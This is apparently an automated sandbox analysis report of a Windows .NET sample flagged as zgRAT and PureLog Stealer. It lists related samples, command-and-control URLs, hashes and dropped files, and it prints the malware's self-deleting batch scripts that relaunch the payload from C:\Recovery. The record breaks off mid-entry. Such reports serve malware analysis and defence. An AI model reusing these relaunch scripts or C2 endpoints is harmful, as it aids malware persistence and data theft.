Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	63
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FuWRu2Mg82.exe renamed because original name is a hash value
Original Sample Name:	6C5F6433BAE4CBF3DC2D1FD40B716B08.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@86/251@1/1
EGA Information:	Successful, ratio: 28.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target FuWRu2Mg82.exe, PID 7344 because it is empty
Execution Graph export aborted for target axnJvpyQnMRKSw.exe, PID 1272 because it is empty
Execution Graph export aborted for target axnJvpyQnMRKSw.exe, PID 7620 because it is empty
Execution Graph export aborted for target axnJvpyQnMRKSw.exe, PID 7968 because it is empty
Execution Graph export aborted for target axnJvpyQnMRKSw.exe, PID 8152 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: FuWRu2Mg82.exe

Simulations

Behavior and APIs

Time	Type	Description
17:32:14	API Interceptor	9x Sleep call for process: axnJvpyQnMRKSw.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.44.238.250	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	rollsroys.top/externaljsapisql.php
	QDJA9geR12.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	merlion.top/PythongameTrafficDatalifepublic.php
	Q9AQFOA6YC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	024171cm.newnyash.top/authgameapiserverlinuxTestcdnDownloads.php
	bR9BxUAkJW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	nazvanie.top/ExternalVmPythonrequestsecurepacketBigloadlocalprivatetemporary.php
	Q13mrh42kO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	267991cm.n9shka.top/videoLowCpugameBigloadProtectuniversalCentralDownloads.php
	LbsPIL0buh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	890959cm.newnyash.top/imagepipejsHttpcpugametraffictestwordpress.php
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	vsratost.top/UpdateMultiasyncDownloads.php
	BdYcIFnY2J.exe	Get hash	malicious	DCRat	Browse	479548cm.nyashka.top/EternalJsLocaltemporary.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HARMONYHOSTING-ASFR	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	QDJA9geR12.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	Q9AQFOA6YC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	bR9BxUAkJW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	Q13mrh42kO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	LbsPIL0buh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	BdYcIFnY2J.exe	Get hash	malicious	DCRat	Browse	37.44.238.250

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BBFiueAC.log	auXl1Tzyme.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	oLlotc8NO3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	9D7RwuJrth.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	b2smJKgMG6.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	01YP9Lwum8.exe	Get hash	malicious	DCRat	Browse
	wYP4G1XOF1.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	w49A5FG3yg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	9XHFe6y4Dj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Recovery\26853581233ef1

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	134
Entropy (8bit):	5.638496048789944
Encrypted:	false
SSDEEP:	3:lw1zn3xrAwWSkVM3WyTzcn2fA9KZQMaIlUuOM79R1l9bVQ:lwNtAwWHsWEZWK4vc9x9e
MD5:	5B6AF978237C4508954D89B6B07DE583
SHA1:	85096BDA71690A8077748251428690025A1C8F07
SHA-256:	6DE4257ECBF503ECD4D64B99C91B92A294EDC439DCCE3BD4CD6E7B6AA203DDA8
SHA-512:	AA150C758D7BDE1429B1AE4037C35D723EA4820DD5FEF66F7199767ED6CDAB8FF1398B5167D2EB161D8B12F4BEB1567D77C82DC7B858EA10AB8DE86C1D41A17D
Malicious:	false
Preview:	OqMFpsUwVuZGmBRcEdl8JAEdsE7xjUg8lwTQJPSXJKPSKZfPNqYCxR8NlsWkvgNBNaezsBSzLOy8uvTTisk25eLUxFoa2rmm6OEt4pgMXj0ic9c0ZCBC6UFtPKCnX16emMCgqj

C:\Recovery\axnJvpyQnMRKSw.exe

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3666432
Entropy (8bit):	7.8229155292844075
Encrypted:	false
SSDEEP:	98304:HCLp6aQhP2k4Xrn/kRCH9ldADNbkAiS5uSM:HK6P2k4XD/kRCd/8YTSm
MD5:	6C5F6433BAE4CBF3DC2D1FD40B716B08
SHA1:	0EBA0DD22B3F5053798EBA26E027EF7383602774
SHA-256:	9BCFA4A19BE080565CAF27F4EA1BC691C124601BB120AAC4CA55802593AF400A
SHA-512:	F82E07CCE03B3BC2B661B1CE014CC4C9F4BECBD695415B714C4C1A0FBF0F3BCAFB59A1F550BBEE687E7BE927F54B20624D6FB017106CA16EE8C0EE126113E84D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\axnJvpyQnMRKSw.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\axnJvpyQnMRKSw.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f+Ve..................7...........8.. ... 8...@.. .......................`8...........@...................................8.K.... 8. ....................@8...................................................... ............... ..H............text.....7.. ....7................. ..`.rsrc... .... 8.......7.............@....reloc.......@8.......7.............@..B..................8.....H.......`...x..............I%-.6.8......................................0..........(.... ........8........E............9.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0.......... ........8........E........v...5...............8....r...ps....z8.... ....~....{....:....& ....8........~....(T...~....(X... ....?.... ....~....{v...9x...& ....8m......... ....8]...~....9.... ....8I...~....(L... .... .... ....s....~....(P......

C:\Recovery\axnJvpyQnMRKSw.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FuWRu2Mg82.exe.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1698
Entropy (8bit):	5.367720686892084
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
MD5:	2C0A3C5388C3FAAFA50C8FB701A28891
SHA1:	D75655E5C231DE60C96FD196658C429E155BEB0F
SHA-256:	A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
SHA-512:	0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\axnJvpyQnMRKSw.exe.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
MD5:	73E7DD0D3AE6532ADBC6411F439B5DE3
SHA1:	427BE8DB5338D856906C1DDFBD186319A02F7567
SHA-256:	A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
SHA-512:	33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Temp\0jztGmSOAj.bat

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	158
Entropy (8bit):	5.282524771610491
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7/X52PiyBktKcKZG1t+kiE2J5xAI5i/YHn:hCRLuVFOOr+DE70iyKOZG1wkn23f8i
MD5:	1E8B412715759B3C0CE555E0D9328ECD
SHA1:	CAE96BA21717E23D2C53F9B8335E219C2B7AF721
SHA-256:	543B6B08519D881EE872695277D2250AAC752FB59B08D2BDBDC5B977C541774D
SHA-512:	3E5C6B86F48FC9C510D5BFC6D8FF1D738AFB62B353023FD1767D2D07BF4EFA419E44AF7A78B3D7D660D66B058CB77AD7274EA10542ACEA11E1B7ABB10D10FFB3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\0jztGmSOAj.bat"

C:\Users\user\AppData\Local\Temp\2LXfWnm1ym

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601647
Encrypted:	false
SSDEEP:	3:YxvvLqvVbn:GGNbn
MD5:	9D840A9D0DADE6D7C4CF9C3B881F0C7E
SHA1:	E56C5BE72667381BC9C474A619BE0B204637AFE9
SHA-256:	3AF40D58E3A5F15B673486FDFF10587F34E3F8E089B1952A1E97A09DE71C11A2
SHA-512:	463EF0C925B9708E975742299186F81BDDC44FA31B017BF8AFB42F49177EF9F4899EB3114082A8C8614BD60DFB0894CB613E0B85715857BFB00DE20C2A3A8D0D
Malicious:	false
Preview:	yBzpjplJUeun3zfnW6Q76J0nJ

C:\Users\user\AppData\Local\Temp\2r9vxghkm3

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.5638561897747225
Encrypted:	false
SSDEEP:	3:Pm61T:O4
MD5:	C1BFDCC9A1BB02933148A8394564B49F
SHA1:	FB2B2DD52C909836E64D2A86857F67C1ED82817C
SHA-256:	5D6F739A2A3F51B5859523FE8F72AC04FA98C08C2C376DB71CC6AF6367510CA9
SHA-512:	64043F9BF23DCB4CCA183DDBFE35576EFACF266AD319E1926F7EDA09CABC5F1A240DB42E0030202A4930B9D6217F63E3112E76F14AB39EF829710B99C071F04B
Malicious:	false
Preview:	jcP5Kn2zSmgp83l1T6AkUI2Zv

C:\Users\user\AppData\Local\Temp\5xIcrgADPl.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.2147894138233015
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE70iyKOZG1wkn23fL9h:HTg9uYDE70ffDr
MD5:	07114AC26E0F75397D6785FF302C314D
SHA1:	2C7F3BF185B0E0AEBB17054267F15133738B72A3
SHA-256:	D0A3E08DC3CD8D5D3BD8F9347C68282B48D0952C5CC18C88F572660D80A7242C
SHA-512:	2249ADE65D1EA54763D5FFC0CAE356593E3EC3643EC2399ADBF5EF0A3580E848D07BA0291B811B97E384272FF8924B06B2A0F2F80DEB669ABD5880DEFE2D470A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5xIcrgADPl.bat"

C:\Users\user\AppData\Local\Temp\6KfhU02lmW.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.1973789629100375
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE70iyKOZG1wkn23fWMzKn:HTg9uYDE70ffPG
MD5:	8AA8D69702FE8B43206750C5C53D78C2
SHA1:	810C413F1C933E4C357ED72DF5BF55C040335121
SHA-256:	A51B2B5F5DCF99DB2E432B48B375A55EF43276D253451AE5AC0117526CFD3862
SHA-512:	E2D430043F7E22CA8E9AEEEB1F90E395D321DE183051E62AB0875EDA93F7336CEC95F65C4E14C47E033DF34F9153279A6B24F257143793AAC5D3A1A65E2C043E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\6KfhU02lmW.bat"

C:\Users\user\AppData\Local\Temp\EF2LbGexCH

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774722
Encrypted:	false
SSDEEP:	3:8/SuHVc5FdshPun:8Q5B
MD5:	5249564CBE3078C593AEB802941C101D
SHA1:	D565373E0FDC6A9DED498CF270DF9DB1D37C1B98
SHA-256:	B6DA4F3769B5AFB6E172D783E7FEC9F266989FB7B9252B0AE1B284A8749B3014
SHA-512:	03D6367D35632E15812A9EBABBC8156CDEC269F4577E5B419834BF1DD35B685A73A8DEE7272924635C352BE7B85194673959D02FBF95398EB9DD89429E6675D2
Malicious:	false
Preview:	I8Z7Joxb0ysiqYJ8wKaTOIDjK

C:\Users\user\AppData\Local\Temp\KYHRvbShtG

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:S8iSzu:jiSq
MD5:	5257F1BCD91A848F5D50FACD6349874D
SHA1:	17A04AA55C587D93244DDA1D4051157D9A909576
SHA-256:	0EE9A1E0B20564923DAAD0C99142CFF4E3B2D4D087DC45F5E5120A4E509A48AB
SHA-512:	B35F9578146E0ED12C3B20D2187D7E5DAA1F7F6FD93DE45CB6E7F0AB21D062D74611C39B702D9A20972F5A35B4FB46B2CBAF49C9EECD00F3E67E216111AD2DFD
Malicious:	false
Preview:	ZUyUpvIlfZG7DoBXlkJB5oz8I

C:\Users\user\AppData\Local\Temp\O2a76Ow1QW.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.234887422449487
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE70iyKOZG1wkn23ffLLq:HTg9uYDE70ff7Lq
MD5:	F787418A4B41E1CE7D3E335F9F6A0550
SHA1:	A0D25F17BB4547361BEA35165FAC8932BE5C9B64
SHA-256:	16C060B13C8C6223268197B156B24207BC19408FDE5A014CBD47A370D2B3BCFE
SHA-512:	05C6124826448873F22EB6D553902CBB8E57E0FBDFE17DCF32BBB178B69F44E9F56DAC3707A075DED3CE86310BF334E80EC5B67CCDE52653401919E95F551D97
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\O2a76Ow1QW.bat"

C:\Users\user\AppData\Local\Temp\O4lRoaYFUn.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.2138765999763805
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE70iyKOZG1wkn23fiwh:HTg9uYDE70ff5
MD5:	44A197BB7DD3DE581E6BE1405B7A4D97
SHA1:	1F01EA29D67D6B8A93BACA532B4325C5BAA1D8BA
SHA-256:	CDF60D99864968871F8750564A0EEFB24A4DD708281E0C8DC604D04804BD854F
SHA-512:	31CE876421837EA7003E3CB6684C33A0D131B01867955A1559B1524BDAE2A3B3ABFB382E69991C3F0A2DEDADF5D7F60E604AAB37D9652CCCA22D2D897952D836
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\O4lRoaYFUn.bat"

C:\Users\user\AppData\Local\Temp\RHLnW0oZVx.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.232929545939731
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE70iyKOZG1wkn23fPoV9H:HTg9uYDE70ffXI9H
MD5:	60630509CCF1FB797572D0F4BC039318
SHA1:	1A109841603F5AAEA928C6CB014BFEFCEC408F42
SHA-256:	EAC01E9869B73377DB0BBC9188FB1AF1D0D799D2E3C76F91F9BE90567CD66E89
SHA-512:	1568C9BFD643DF18A1131D3A17B73E1248FBAB1E527B5B65D26CDD0AEECAF790590598BE9CBE6B5A832D34CCBA7FBB37327FB786997F832C3357F6102BAF02DA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\RHLnW0oZVx.bat"

C:\Users\user\AppData\Local\Temp\VW6Uh1R2rX.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.230654462775442
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE70iyKOZG1wkn23fEc:HTg9uYDE70ffcc
MD5:	210EA8EFF14DAEECAC31BCEF368C8BAE
SHA1:	2F6B83A39E93BD703AD631D1BC2687EC8AC849DC
SHA-256:	786A027395237D18DD27ED15FD2A6BDD9B3067E27A80C9BB895F1B693CFD4EBE
SHA-512:	B058A62A8AD9FA12173D16C93A8D2038534EDC2EA96763C97D957CEEF77E958E8F2372C41C3F34D68A58E0B3BB963A6B55425C20CB5B23330341FC5F316CE656
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\VW6Uh1R2rX.bat"

C:\Users\user\AppData\Local\Temp\Z2fB1CVtAK

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:mOVUpp4Q:5VmJ
MD5:	DA5BBF7AB67F2E160151E66B032FCF35
SHA1:	0140F44E6F7EEBAE71B4B99CDA35C11A08E5274C
SHA-256:	6A8DAA40A96A691ECA71C72C772D69F688B135E8D31477C9A9F0B144493EECC7
SHA-512:	9800BA06FFC0B6944E564CDB2A929EC4DD0BAF757EFC45470C7EC9A798CFFACFD7B8E0228BEB1D58F77021257136D033C54CCB9951B03DECDD0F31D6EED075F6
Malicious:	false
Preview:	uMakmns6qgOppx1sCjLoJqN2i

C:\Users\user\AppData\Local\Temp\ZDXo03hK0a

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:AxQcAj1v:wG1v
MD5:	533BAFAE513ECF90070AB95AF165CC04
SHA1:	949EBCCD095124229C4A2E6218CBEE13E5311038
SHA-256:	AAB6FF5A6889941FFE4AA93FE2D50596167B590A1292D6DBE385FBC95DE87488
SHA-512:	1767EA80A49BE6FF4F346B125D13721E3E73EB804818866F300DE3CA0975EFA73D29B75DC9EEC2F9D9B8897DDFA4292FB7B12EA76EC2F4F380E59374883C508A
Malicious:	false
Preview:	wGCiETIrsoQm9eFrSBWS5SdWJ

C:\Users\user\AppData\Local\Temp\dYHSyFVcIa.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.237267155438191
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE70iyKOZG1wkn23f9Gn:HTg9uYDE70ff0n
MD5:	F14F06F784E6104AD263C3F238CBFE2A
SHA1:	7FB828016C42F9163E36F97253EAEE93027D4A0E
SHA-256:	61FA586EA769DA6AF6CC413FF466C266228C150308F49D7F661F7DEF04FC0080
SHA-512:	68AEF5349B6DF77882BAFF7BA7D96FA612CE1FB9F9F9E18EB28DD6C6814AEE6E4DF05FBE7696CC971EE02A6CA207422DEF8219AC6906B16402D50337BD9D53B5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\dYHSyFVcIa.bat"

C:\Users\user\AppData\Local\Temp\fgGbUuK3qD

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.053660689688185
Encrypted:	false
SSDEEP:	3:/95kj:/nkj
MD5:	50F6754EEA7CC4CD1D98671A909D94E1
SHA1:	BDDA76B832EE028AF45ED0A4EAD595E534819BF3
SHA-256:	565F13E754BABB74B4CAF221A1F8FE604213D5909D83FAAB11B12E4FC2C7328C
SHA-512:	844601B1256A14CF979D76BC5FF8A62DBAB051034E03447A8237B022290CD97AB41B16BB5487666C09A0CFC90B871BCAE945574ECCD3C506F630331CA66ADB7B
Malicious:	false
Preview:	QV2h2422YOGf6yIgoKGNU7MGQ

C:\Users\user\AppData\Local\Temp\gXPzuBRgcB.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	5.257008011353367
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE70iyKOZG1wkn23flK:HTg9uYDE70ffA
MD5:	DDA239130364C007D948CFCBECB7EAD6
SHA1:	CD71BF84C48BCD7A4DCCCD2645F24F61724D234D
SHA-256:	D1585CF864C85AB7274FF1BD821DE788B05B5AFE925358D7EA6BB5EF816155E6
SHA-512:	69018FA1B3A6279A3DFB2AC83FF0A4BCEC861EE58F02D591853EF8986CCA5F47784E17C726E895C7CA2E81DA35C7D4667183EA8F463C9D878C198EE99035002D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\axnJvpyQnMRKSw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\gXPzuBRgcB.bat"

C:\Users\user\AppData\Local\Temp\k9Xkw6Am4N.bat

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
